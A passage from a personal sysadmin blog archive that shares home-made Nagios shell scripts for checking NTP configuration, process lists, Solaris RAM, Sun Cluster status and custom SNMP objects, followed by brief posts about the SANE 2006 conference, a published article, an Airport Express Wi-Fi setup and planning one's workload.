	Linux) CFGFILE="/etc/ntp.conf"; IP_SERVER=`host $NTP_SERVER | awk '{print $4}'` ;;
	SunOS) CFGFILE="/etc/inet/ntpd.conf"; IP_SERVER=`getent hosts $NTP_SERVER | awk '{print $2}'`;;
	Darwin) CFGFILE="/etc/ntp.conf"; IP_SERVER=`host $NTP_SERVER | awk '{print $4}'` ;;
	*) ;;
    esac

    REAL_SERVER=`cat $CFGFILE | grep ^server | awk '{print $2}'`

[ $DEBUG -gt 0 ] && echo "Gather_config: Host name for required server is $NTP_SERVER." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Gather_config: IP address for required server is $IP_SERVER." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Gather_config: currently configured server is $REAL_SERVER." >> $DEBUGFILE
} 

function check_config()
{
    if [ $REAL_SERVER != $NTP_SERVER ]
    then
	if [ $REAL_SERVER != $IP_SERVER ]
	then
	    echo "NOK - NTP client is not configured to speak to $NTP_SERVER"
	    exit $STATE_WARNING
     	fi
    fi
}


### FINALLY, THE MAIN ROUTINE ###

gather_config
check_config

# Nothing caused us to exit early, so we're okay.
echo "OK - NTP client configured correctly."
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_processes

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

A very simply script that takes a list of processes, instead of a single processes name (as is the case with check_process). This should make monitoring a basic list of processes a lot easier. I really should change the script in such a way that it takes the process list from the command line, instead of from the $LIST variable that's defined internally. I'll do that when I have the time.

Until I've made those change, I use the script by copying check_processes to a new file which is used specifically for one purpose. For example check_linux_processes and check_solaris_processes check a list of processes that should be up and running on Linux and Solaris respectively.

This check script should work on just about any UNIX OS.



#!/bin/bash
#
# Process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 13-07-2006
# 
# Usage: ./check_solaris_processes
#
# Description:
# This script couldn't be simpler than it is. It just checks to see
# whether a predefined list of processes is up and running. 
#
# Limitations:
#   This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
# If there one of the processes is down, a CRIT is issued.
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PROGNAME="check_linux_processes"
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh


### DEFINING THE PROCESS LIST ###
LIST="init"


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
        echo "Usage: $PROGNAME"
        echo "Usage: $PROGNAME --help"
}

print_help() {
        echo ""
        print_usage
        echo ""
        echo "Basic processes list monitor plugin for Nagios"
        echo ""
        echo "This plugin not developped by the Nagios Plugin group."
        echo "Please do not e-mail them for support on this plugin, since"
        echo "they won't know what you're talking about :P"
        echo ""
        echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
        case "$1" in
          --help) print_help; exit $STATE_OK;;
          -h) print_help; exit $STATE_OK;;
          *) print_usage; exit $STATE_UNKNOWN;;
        esac
done


### FINALLY THE MAIN ROUTINE ###

COUNT="0"
DOWN=""

for PROCESS in `echo $LIST`
do
        if [ `ps -ef | grep -i $PROCESS | grep -v grep | wc -l` -lt 1 ]
        then
                let COUNT=$COUNT+1
                DOWN="$DOWN $PROCESS"
        fi
done

if [ $COUNT -gt 0 ]
then
        echo "NOK - $COUNT processes not running: $DOWN"
        exit $STATE_CRITICAL
fi

# Nothing caused us to exit early, so we're okay.
echo "OK - All requisite processes running."
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios script: check_processes

2006-06-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor to check percentage of used physical RAM.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. Written in ksh and tested with:

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!

I've also -finally- changed the script so that it takes the Warning and Critical percentages from the command line.

UPDATE 15/07/2006:

Whoops... I just noticed that the file had gone missing <3



#!/bin/ksh
#
# Free physical RAM monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 20-10-2006
# 
# Usage: ./check_ram
#
# Description:
# This plugin determines how much of the physical RAM in the 
# system is in use.
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
# And it really is only usefull at DTV Labs.
#
# Output:
# The script returns either a WARN or a CRIT, depending on the 
# percentage of free physical memory.
#

# Enabling the following dumps information into DEBUGFILE at various
# stages during the execution of this script.
DEBUG="1"
DEBUGFILE="/tmp/foobar"
rm $DEBUGFILE >/dev/null 2>&1
echo "Starting script check_ram." > $DEBUGFILE

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
        exit 1
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/usr/local/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
        echo "Usage: $PROGNAME warning-percentage critical-percentage"
        echo ""
        echo "e.g. : $PROGNAME 15 5"
        echo "This will start alerting when more than 85% of RAM has"
        echo "been used."
        echo ""
}

print_help() {
        echo ""
        print_usage
        echo ""
        echo "Free physical RAM plugin for Nagios"
        echo ""
        echo "This plugin not developped by the Nagios Plugin group."
        echo "Please do not e-mail them for support on this plugin, since"
        echo "they won't know what you're talking about :P"
        echo ""
        echo "For contact info, read the plugin itself..."
}

if [ $# -lt 2 ]; then print_help; exit $STATE_WARNING;fi

case "$1" in
        --help) print_help; exit $STATE_OK;;
        -h) print_help; exit $STATE_OK;;
        *) if [  $# -lt 2 ]; then print_help; exit $STATE_WARNING;fi ;;
esac

RAM_WARN=$1
RAM_CRIT=$2
[ $DEBUG -gt 0 ] && echo "Warning and Critical percentages are $RAM_WARN and $RAM_CRIT." >> $DEBUGFILE

if [ $RAM_WARN -le RAM_CRIT ]
then
        echo "Warning percentage should be larger than critical percentage."
        exit $STATE_WARNING
fi

check_space()
{
[ $DEBUG -gt 0 ] && echo "Starting check_space." >> $DEBUGFILE
        TOTALSPACE=0
        TOTALSPACE=`prtconf | grep ^"Memory size" | awk '{print $3}'`
[ $DEBUG -gt 0 ] && echo "Total space is $TOTALSPACE." >> $DEBUGFILE

        TOTALFREE=0
        TOTALFREE=`vmstat 2 2 | tail -1 | awk '{print $5}'`
[ $DEBUG -gt 0 ] && echo "Free space is $TOTALFREE." >> $DEBUGFILE
        let TOTALFREE=$TOTALFREE/1000
[ $DEBUG -gt 0 ] && echo "Free space, div1000 is $TOTALFREE." >> $DEBUGFILE
}

check_percentile() 
{
[ $DEBUG -gt 0 ] && echo "Starting check_percentile." >> $DEBUGFILE
        FRACTION=`echo "scale=2; $TOTALFREE/$TOTALSPACE" | bc`
[ $DEBUG -gt 0 ] && echo "Fraction is $FRACTION." >> $DEBUGFILE

        PERCENT=`echo "scale=2; $FRACTION*100" | bc | awk -F. '{print $1}'`
[ $DEBUG -gt 0 ] && echo "Percentile is $PERCENT." >> $DEBUGFILE

        if [ $PERCENT -lt $RAM_CRIT ]; then
[ $DEBUG -gt 0 ] && echo "$PERCENT is smaller than $RAM_CRIT. Critical." >> $DEBUGFILE
          echo "RAM NOK - Less than $RAM_CRIT % of physical RAM is unused."
          exitstatus=$STATE_CRITICAL
          exit $exitstatus
        fi

        if [ $PERCENT -lt $RAM_WARN ]; then
[ $DEBUG -gt 0 ] && echo "$PERCENT is smaller than $RAM_WARN. Warning." >> $DEBUGFILE
          echo "RAM NOK - Less than $RAM_WARN % of physical RAM is unused."
          exitstatus=$STATE_WARNING
          exit $exitstatus
        fi
}

check_space
check_percentile

[ $DEBUG -gt 0 ] && echo "$PERCENT is greater than $RAM_WARN. OK." >> $DEBUGFILE
echo "RAM OK - $TOTALFREE MB out of $TOTALSPACE MB RAM unused."
exitstatus=$STATE_OK
exit $exitstatus



kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_suncluster

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

A few of our projects and services are run on Solaris systems running Sun Cluster software. Since there were no Nagios scripts available to perform checks against Sun Cluster I made a basic script that checks the most important factors.

This script performs a different function, depending on the parameter with which it is called. This allows you to define multiple service checks in Nagios, without needing seperate check scripts for each.

EDIT:

Oh! Just like my other recent Nagios scripts, check_suncluster comes with a debugging option. Set $DEBUG at the top of the file to anything larger than zero and the script will dump information at various stages of its execution. And like my other, recent scripts it also comes with its own test script.



#!/usr/bin/ksh
#
# Nagios check script for Sun Cluster.
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide SYS, the Netherlands
# Last Modified: 25-09-2006
#
# Usage: ./check_suncluster [-t, -q, -g, -G resource-group, -r, -R resource, -i]
#
# Description:
# This script is capable of performing a number of basic checks on a 
# system running Sun Cluster. Depending on the parameter you pass to 
# it, it will check:
# * Transport paths (-t).
# * Quorum (-q).
# * Resource groups (-g).
# * One selected resource group (-G).
# * Resources (-r).
# * One selected resource (-R).
# * IPMP groups (-i).
#
# Limitations:
# This script will only work with Korn shell, due to some funky while
# looping with pipe forking. Bash doesn't handle this very gracefully,
# due to its sub-shell variable scoping. Maybe I really should learn
# to program in Perl.   
#
# Output:
# * Transport paths return a WARN when one of the paths is down and a
#   CRIT when all paths are offline. 
# * Quorum returns a WARN when not all, but enough quorum devices are
#   available. It returns a CRIT when quorum cannot be reached.
# * Resource groups returns a CRIT when a group is offline on all nodes
#   and a WARN if a group is in an unstable state.
# * Resources returns a CRIT when a resource is offline on all nodes
#   and a WARN if a resource is in an unstable state.
# * IPMP groups returns a CRIT when a group is offline.
#
# Other notes:
# Aside from the debugging output that I've built into most of my recent
# scripts, this check script will also have a testing mode  hacked on, as
# a bag on the side. This testing mode is only engaged when the test_check_suncluster
# script is being run and will intentionally "break" a few things, to 
# verify the failure options of this check script.
#

# Enabling the following dumps information into DEBUGFILE at various
# stages during the execution of this script.
DEBUG=0
DEBUGFILE="/tmp/foobar"

if [ -f /tmp/neko-wa-baka ]
then
	if [ `cat /tmp/neko-wa-baka` == "Nyo!" ]
	then
	   TESTING="1"
	else
	   TESTING="0"
	fi
else
	TESTING="0"
fi


### REQUISITE NAGIOS USER INTERFACE STUFF ###

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin:/usr/cluster/bin"
LIBEXEC="/usr/local/nagios/libexec"
PROGNAME="check_suncluster"
. $LIBEXEC/utils.sh

[ $DEBUG -gt 0 ] && rm $DEBUGFILE 

print_usage() {
        echo "Usage: $PROGNAME [-t, -q, -g, -G resource-group, -r, -R resource, -i]"
        echo "Usage: $PROGNAME --help"
}

print_help() {
        echo ""
        print_usage
        echo ""
        echo "Sun Cluster check plugin for Nagios"
        echo ""
        echo "-t: check transport paths"
        echo "-q: check quorum"
        echo "-g: check resource groups"
        echo "-G: check one individual resource group"
        echo "-r: check all resources"
        echo "-R: check one individual resources"
        echo "-i: check IPMP groups"
        echo ""
        echo "This plugin not developped by the Nagios Plugin group."
        echo "Please do not e-mail them for support on this plugin, since"
        echo "they won't know what you're talking about :P"
        echo ""
        echo "For contact info, read the plugin itself..."
}


### SUB-ROUTINE DEFINITIONS ### 

function check_transport_paths
{
[ $DEBUG -gt 0 ] && echo "Starting check_transport_path subroutine." >> $DEBUGFILE

	TOTAL=`scstat -W | grep "Transport path:" | wc -l`
	let COUNT=0

	scstat -W | grep "Transport path:" | awk '{print $3" "$6}' | while read PATH STATUS
	do
[ $DEBUG -gt 0 ] && echo "Before math, Count has the value of $COUNT." >> $DEBUGFILE
		if [ $STATUS == "online" ]
		then
		   let COUNT=$COUNT+1
		fi
[ $DEBUG -gt 0 ] && echo "Path: $PATH has status $STATUS" >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Count: $COUNT online transport paths." >> $DEBUGFILE
	done

[ $DEBUG -gt 0 ] && echo "Count: Outside the loop it has a value of $COUNT." >> $DEBUGFILE
[ $TESTING -gt 0 ] && COUNT="0"

	if [ $COUNT -lt 1 ]
	then
	   echo "NOK - No transport paths online."
	   exit $STATE_CRITICAL
	elif [ $COUNT -lt $TOTAL ]
	then
	   echo "NOK - One or more transport paths offline."
	   exit $STATE_WARNING
	fi
}

function check_quorum
{
[ $DEBUG -gt 0 ] && echo "Starting check_quorum subroutine." >> $DEBUGFILE
	NEED=`scstat -q | grep "votes needed:" | awk '{print $4}'`
	PRES=`scstat -q | grep "votes present:" | awk '{print $4}'`

[ $DEBUG -gt 0 ] && echo "Quorum needed: $NEED" >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Quorum present: $PRES" >> $DEBUGFILE

[ $TESTING -gt 0 ] && PRES="0"
	if [ $PRES -ge $NEED ]
	then
[ $DEBUG -gt 0 ] && echo "Enough quorum votes." >> $DEBUGFILE
		scstat -q | grep "votes:" | awk '{print $3" "$6}' | while read VOTE STATUS
		do
[ $DEBUG -gt 0 ] && echo "Vote: $VOTE has status $STATUS." >> $DEBUGFILE
			if [ $STATUS != "Online" ] 
			then
			   echo "NOK - Quorum vote $VOTE not available."
			   exit $STATE_WARNING
			fi
		done		
	else
[ $DEBUG -gt 0 ] && echo "Not enough quorum." >> $DEBUGFILE
		echo "NOK - Not enough quorum votes present."
		exit $STATE_CRITICAL
	fi
}

function check_resource_groups
{
[ $DEBUG -gt 0 ] && echo "Starting check_resource_groups subroutine." >> $DEBUGFILE
	scstat -g | grep "Group:" | awk '{print $2}' | sort -u | while read GROUP
	do
	ONLINE=`scstat -g | grep "Group: $GROUP" | grep "Online" | wc -l`
	WEIRD=`scstat -g | grep "Group: $GROUP" | grep -v "Resources" | grep -v "Online" | grep -v "Offline" | wc -l`
[ $DEBUG -gt 0 ] && echo "Resource Group $GROUP has $ONLINE instances online." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Resource Group $GROUP has $WEIRD instances in a weird state." >> $DEBUGFILE
[ $TESTING -gt 0 ] && ONLINE="0"
		if [ $ONLINE -lt 1 ] 
		then
		   echo "NOK - Resource group $GROUP not online."
		   exit $STATE_CRITICAL
		fi
                if [ $WEIRD -gt 1 ]
                then
                   echo "NOK - Resource group $GROUP is an unstable state."
                   exit $STATE_WARNING
                fi
	done
}

function check_resource_grp
{
[ $DEBUG -gt 0 ] && echo "Starting check_resource_grp subroutine." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Selected group: $RGROUP" >> $DEBUGFILE
	ONLINE=`scstat -g | grep $RGROUP | grep "Online" | wc -l`
	WEIRD=`scstat -g | grep $RGROUP | grep -v "Resources" | grep -v "Online" | grep -v "Offline" | wc -l`
[ $DEBUG -gt 0 ] && echo "Resource Group $GROUP has $ONLINE instances online." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Resource Group $GROUP has $WEIRD instances in a weird state." >> $DEBUGFILE
[ $TESTING -gt 0 ] && ONLINE="0"
	if [ $ONLINE -lt 1 ] 
	then
	   echo "NOK - Resource group $RGROUP not online."
	   exit $STATE_CRITICAL
	fi
	if [ $WEIRD -gt 1 ]
        then
           echo "NOK - Resource group $RGROUP is in an unstable state."
           exit $STATE_WARNING
        fi
}

function check_resources
{
[ $DEBUG -gt 0 ] && echo "Starting check_resources subroutine." >> $DEBUGFILE
	RESOURCES=`scstat -g | grep "Resource:" | awk '{print $2}' | sort -u`
[ $DEBUG -gt 0 ] && echo "List of resources to check: $RESOURCES" >> $DEBUGFILE
	for RESOURCE in `echo $RESOURCES`
	do
	ONLINE=`scstat -g | grep "Resource: $RESOURCE" | awk '{print $4}' | grep "Online" | wc -l` 
	WEIRD=`scstat -g | grep "Resource: $RESOURCE" | awk '{print $4}' | grep -v "Online" | grep -v "Offline" | wc -l`
[ $DEBUG -gt 0 ] && echo "Resource $RESOURCE has $ONLINE instances online." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Resource $RESOURCE has $WEIRD instances in a weird state." >> $DEBUGFILE
[ $TESTING -gt 0 ] && ONLINE="0"
		if [ $ONLINE -lt 1 ] 
		then
		   echo "NOK - Resource $RESOURCE not online."
		   exit $STATE_CRITICAL
		fi
                if [ $WEIRD -gt 1 ]
                then
                   echo "NOK - Resource $RESOURCE is in an unstable state."
                   exit $STATE_WARNING
                fi
	done
}

function check_rsrce
{
[ $DEBUG -gt 0 ] && echo "Starting check_rsrce subroutine." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Selected resource: $RSRCE" >> $DEBUGFILE
	ONLINE=`scstat -g | grep "Resource: $RSRCE" | awk '{print $4}' | grep "Online" | wc -l`
	WEIRD=`scstat -g | grep "Resource: $RSRCE" | awk '{print $4}' | grep -v "Online" | grep -v "Offline" | wc -l`
[ $DEBUG -gt 0 ] && echo "Resource $RESOURCE has $ONLINE instances online." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "Resource $RESOURCE has $WEIRD instances in a weird state." >> $DEBUGFILE
[ $TESTING -gt 0 ] && ONLINE="0"
	if [ $ONLINE -lt 1 ] 
	then
	   echo "NOK - Resource $RESOURCE not online."
	   exit $STATE_CRITICAL
	fi
	if [ $WEIRD -gt 1 ]
        then
           echo "NOK - Resource $RESOURCE is in an unstable state."
           exit $STATE_WARNING
        fi
}

function check_ipmp
{
[ $DEBUG -gt 0 ] && echo "Starting check_ipmp subroutine." >> $DEBUGFILE
	scstat -i | grep "IPMP Group:" | awk '{print $3" "$5}' | while read GROUP STATUS
	do
[ $DEBUG -gt 0 ] && echo "IPMP Group: $GROUP has status $STATUS" >> $DEBUGFILE
		if [ $STATUS != "Online" ] 
		then
		   echo "NOK - IPMP group $GROUP not online."
		   exit $STATE_CRITICAL
		fi
if [ $TESTING -gt 0 ]
then
   echo "NOK - IPMP group $GROUP not online."
   exit $STATE_CRITICAL
fi
	done
}

### THE MAIN ROUTINE FINALLY STARTS ###

[ $DEBUG -gt 0 ] && echo "Starting main routine." >> $DEBUGFILE

if [ $# -lt 1 ]
then
	print_usage
	exit $STATE_UNKNOWN
fi

[ $DEBUG -gt 0 ] && echo "More than one argument." >> $DEBUGFILE
[ $DEBUG -gt 0 ] && echo "" >> $DEBUGFILE

case "$1" in
	--help) print_help; exit $STATE_OK;;
	-h) print_help; exit $STATE_OK;;
	-t) check_transport_paths;;
	-q) check_quorum;;
	-g) check_resource_groups;;
	-G) RGROUP="$2"; check_resource_grp;;
	-r) check_resources;;
	-R) RSRCE="$2"; check_rsrce;;
	-i) check_ipmp;;
	*) print_usage; exit $STATE_UNKNOWN;;
esac

[ $DEBUG -gt 0 ] && echo "No problems. Exiting normally." >> $DEBUGFILE

# None of the other subroutines forced us to exit 1 before here, so let's quit with a 0.
echo "OK - Everything running like it should"
exit $STATE_OK

#!/usr/bin/bash

function testrun()
{
	echo "Running without parameters."
	/usr/local/nagios/libexec/check_suncluster 
	echo "Exit code is $?."
	echo ""

	echo "Testing transport paths."
	/usr/local/nagios/libexec/check_suncluster -t
	echo "Exit code is $?."
	echo ""

	echo "Quorum votes."
	/usr/local/nagios/libexec/check_suncluster -q
	echo "Exit code is $?."
	echo ""

	echo "Checking all resource groups."
	/usr/local/nagios/libexec/check_suncluster -g
	echo "Exit code is $?."
	echo ""

	echo "Checking individual resource groups."
	for GROUP in `scstat -g | grep "Group:" | awk '{print $2}' | sort -u`
	do
		echo "Running for group $GROUP."
		/usr/local/nagios/libexec/check_suncluster -G $GROUP
		echo "Exit code is $?."
		echo ""
	done

	echo "Checking all resources."
	/usr/local/nagios/libexec/check_suncluster -r
	echo "Exit code is $?."
	echo ""
	
	echo "Checking all resources."
	for RESOURCE in `scstat -g | grep "Resource:" | awk '{print $2}' | sort -u`
	do
		echo "Running for resource $RESOURCE."
		/usr/local/nagios/libexec/check_suncluster -R $RESOURCE
		echo "Exit code is $?."
		echo ""
	done
	
	echo "Checking IPMP groups."
	/usr/local/nagios/libexec/check_suncluster -i
	echo "Exit code is $?."
	echo ""
}

function breakstuff()
{
	# Now we'll start breaking things!!
	echo ""
	echo "Now it's time to start breaking things! Gruaargh!"
	echo "Mind you, it's all fake and simulated. I am not changing -anything-"
	echo "about the cluster itself."
	echo ""
	
	echo "Nyo!" > /tmp/neko-wa-baka 
}

echo "Starting clean"
rm /tmp/neko-wa-baka /tmp/foobar >/dev/null 2>&1
echo ""

testrun
breakstuff
testrun

echo "Starting clean at the end"
rm /tmp/neko-wa-baka  >/dev/null 2>&1
echo ""

kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios script: retrieve_custom_snmp

2006-06-01 00:00:00

This script was written while I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

One of the things we've been looking into recently, is running the standard Nagios plugins through SNMP instead of through NRPE. Putting aside the discussion of the various merits and flaws such a solution has, let's say that it works nicely.

How do you do this?

In your snmpd.conf add a line like:

exec .1.3.6.1.4.1.6886.4.1.1 check_load /usr/local/nagios/libexec/check_load

exec .1.3.6.1.4.1.6886.4.1.2 check_mem /usr/local/nagios/libexec/check_mem –w 85 –c 95

exec .1.3.6.1.4.1.6886.4.1.3 check_swap /usr/local/nagios/libexec/check_swap -w 15% -c 5%

What this does, is tell the SNMP daemon to run the check_load script when someone asks for object .1.3.6.1.4.1.6886.4.1.1 (or .2, or .3). The exit code for the script will be place in OID.100.0 and the first line of output will be placed in OID.101.1. This script retrieves those two values through SNMP and returns them to Nagios.

Your checkcommands.cfg should contain something like:

define command{

command_name retrieve_custom_snmp

command_line $USER1$/retrieve_custom_snmp -H $HOSTADDRESS$ -o $ARG1$ }

The "-o" parameter takes the OID you have selected for your custom check.

Now... How do you select an OID? There's two ways:

1. The WRONG way = randomly selecting some OID. You might pick an OID which is needed for other monitoring purposes in your network.

2. The RIGHT way = requesting a private Enterprise ID for your company at IANA. You are free to build an SNMP tree beneath this EID. For example, the EID 6886 mentioned above is registered to KPN (my current client). The sub-tree .4.1 contains all OIDs referring to Nagios checks performed by my department.

Before sending out that request, please check the current EID list to see if you company already owns a private subtree. If that's the case, contact the "owner" to request your own part of the subtree.

UPDATE (2006-10-02):

Thanks to the kind folks on the Nagios Users ML I've found out that my original version of the script was totally bug-ridden. I've made a big bunch of adjustments and now the script should work properly. Thanks especially to Andreas Ericsson.



#!/bin/bash
#
# Script to retrieve custom SNMP objects set using the "exec" handler
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 18-07-2006
# 
# Usage: ./retrieve_custom_snmp
#
# Description:
#   On our Nagios client systems we use a lot of custom MIB OIDs which are
# registered under our own Enterprise ID. A whole bunch of the 
# original Nagios script are run through the SNMP daemon and their exit
# codes and output are appended to specific OID. This all happens using the
# SNMP "exec" handler.
#   Unfortunately the default check_snmp script doesn't allow for easy 
# handling of these objects, so I hacked together a quick script. 
#
# So basically this script doesn't do any checking. It just retrieves 
# information :)
#
# Limitations:
# This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
# The exit code is the exit code retrieved from OID.100.1. It is temporarily
# stored in $EXITCODE.
# The output string is the string retrieved from OID.101.1. It is tempo-
# rarily stored in $OUTPUT.
#
# Other notes:
#   If you ever run into problems with the script, set the DEBUG variable
# to 1. I'll need the output the script generates to do troubleshooting.
# See below for details.
#   I realise that all the debugging commands strewn throughout the script
# may make things a little harder to read. But in the end I'm sure it was
# well worth adding them. It makes troubleshooting so much easier. :3
#   Also, for some reason the case statement with the shifts (to detect
# passed options) doesn't seem to be working right. FIXME!
#
# Check command definition:
# define command{
#       command_name    retrieve_custom_snmp
#       command_line    $USER1$/retrieve_custom_snmp -H $HOSTADDRESS$ -o $ARG1$
#		}
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh
PROGNAME="retrieve_custom_snmp"
COMMUNITY="public"

[ `uname` == "SunOS" ] && SNMPGET="/usr/local/bin/snmpget -Oqv -v 2c -c $COMMUNITY"
[ `uname` == "Darwin" ] && SNMPGET="/usr/bin/snmpget -Oqv -v 2c -c $COMMUNITY"
[ `uname` == "Linux" ] && SNMPGET="/usr/bin/snmpget -Oqv -v 2c -c $COMMUNITY"

### DEBUGGING SETUP ###
# Cause you never know when you'll need to squash a bug or two
DEBUG="0"

if [ $DEBUG -gt 0 ]
then
        DEBUGFILE="/tmp/foobar"
        rm $DEBUGFILE >/dev/null 2>&1
fi


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
	echo "Usage: $PROGNAME -H hostname -o OID"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Script to retrieve the status for custom SNMP objects."
	echo ""
	echo "This plugin not developped by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1"; do
    case "$1" in
        --help)
            print_help
            exit $STATE_OK
            ;;
        -h)
            print_help
            exit $STATE_OK
            ;;
        -H)
			HOST=$2
	        shift
            ;;
        -o)
	    	OID=$2
	    	STATUS="$OID.100.1"
	    	STRING="$OID.101.1"
            shift
            ;;
        *)
            echo "Unknown argument: $1"
            print_usage
            exit $STATE_UNKNOWN
            ;;
    esac
    shift
done


### FINALLY... RETRIEVING THE VALUES ###

EXITCODE=`$SNMPGET $HOST $STATUS`
[ $DEBUG -gt 0 ] && echo "Retrieve exit code is $EXITCODE" >> $DEBUGFILE
 
OUTPUT=`$SNMPGET $HOST $STRING | sed 's/"//g'`
[ $DEBUG -gt 0 ] && echo "Retrieve status message is: $OUTPUT" >> $DEBUGFILE

echo $OUTPUT
exit $EXITCODE


kilala.nl tags: , , ,

View or add comments (curr. 0)

Attending the SANE 2006 conference

2006-05-18 14:31:00

Thought I'd give you a little update from SANE'06. I'll keep it short, since there isn't a horrible lot to tell.

* Monday: Linux SysAd course was cancelled so me and Frank switched over to the IPSec course. This was 100% new material to me and (while boring at times) it was quite interesting. Now I'll at least know what people are talking about.

* Tuesday: The Solaris SMF tutorial was well worth the money, although a full day would've suited the material -much- better than half a day. In the AM I decided to crash the BSD Packet Filter tutorial and I guess the tutor should be happy I did. He had some trouble with the Powerbook used for the presentation and I was able to resolve his problems :)

* Wednesday: A full day of CF Engine, which was -totally- worth the money! Mark Burgess is an awesome speaker! Funny, smart and capable of conveying the heart of the matter I'd have loved to have this guy as a teacher in college!

* Thursday: As I suspected the conference itself is quite "meh". A few interesting speeches throughout the day, but I'm mostly taking things slowly. Instead I'm reading a bit in my new books. Unfortunately I slept -horribly- last night, so I'll be skipping the Social Event in the evening. :(


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Travelling to SANE 2006 in Delft.

2006-05-15 18:17:00

The next few days I'll be cooped up in a hotel in Delft with my colleague Frank. We'll be visiting the Sane 2006 conference, which is a combination of vacation and studying. The first three days will consist of tutorials, with the remaining two being filled with various talks and keynotes. Should anyone feel the need to hook up with me, I'll be taking the following lectures:

* Monday = Linux system administration

* Tuesday = The Solaris service management facility

* Wednesday = Host configuration and maintenance with CFEngine

* Naturally we'll also be attending the Social Event on Thursday.

Just look for the guy with the funky iBook and the Snow t-shirt. <3


kilala.nl tags: , , ,

View or add comments (curr. 0)

I get published! Again :)

2006-02-06 20:37:00

Pride++

Today I received my copy of February's issue of ;Login: which contains the publication of my most recent article. The one about planning projects and your personal time. I love having stuff published. Once Anime Con 2006 is over and done with I'll probably write some more articles! Speaking of Anime Con, I'd better get to work before going to bed :p


kilala.nl tags: , ,

View or add comments (curr. 0)

Using Airport Express with OSX and Windows

2006-01-27 06:36:00

We all know I love just about anything Apple Computers makes. There's no secret in that. However, I myself was very much amazed at the ease of setup when it comes to an Airport Wifi network. Yesterday I received the Airport Express base station and the Airport Extreme Card that I'd ordered trough the Apple Store. Looking forward to an evening filled with tweaking and fiddling, I was pleasantly surprised that all it took was fifteen minutes! And that includes installing the AE Card into my Powermac. It really is just as easy as plugging it in :)

I also had expected to have loads of problems to get Windows XP to work with Wifi, after hearing horror stories. And like I had feared Marli's laptop refused to talk to our newly built Wifi network "Kilala" ( original name, ain't it? :P ). However, that was easily fixed by completely reconfiguring the base station using the Windows software. Now the laptop had no qualms in connecting to the network and my Apple computers still attached flawlessly.

I'm one happy camper! Now all we need to do is to wait for Casema to deliver the cable modem, so we can get hooked up to the Internet again. The parcel gets delivered on Valentine's Day :D Awesome!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Keeping track of time. Thomas discusses the art of planning your workload

2005-11-24 08:30:00

A PDF version of this document is available. Get it over here.

Way back in 1999 when I started my second internship I was told to do something that I had never done before: create and maintain a planning of my activities.

At the time this seemed like a horribly complex thing to do, but my supervisor was adamant. He did not want me to shift one bit of work before I had taken a stab at a rough planning. So I twiddled in Word and I fumbled in Excel and finally, an hour or two later, I had finally finished my first project planning ever. And there was much rejoicing!... Well, not really, but I felt that a Monty Python reference would be welcome right about now...

So now it's six years later and I still benefit from the teachings of my past mentor. However, around me I see people who appear to have trouble keeping track of all of their work. Which is exactly why I was originally asked to write this article.

I have always worked in large corporate environments with several layers of management between the deities and me, which always seems to obfuscate matters to no end. However, the ideas outlined in the next few paragraphs will be applicable to anyone in any situation.

Juggling egg shells

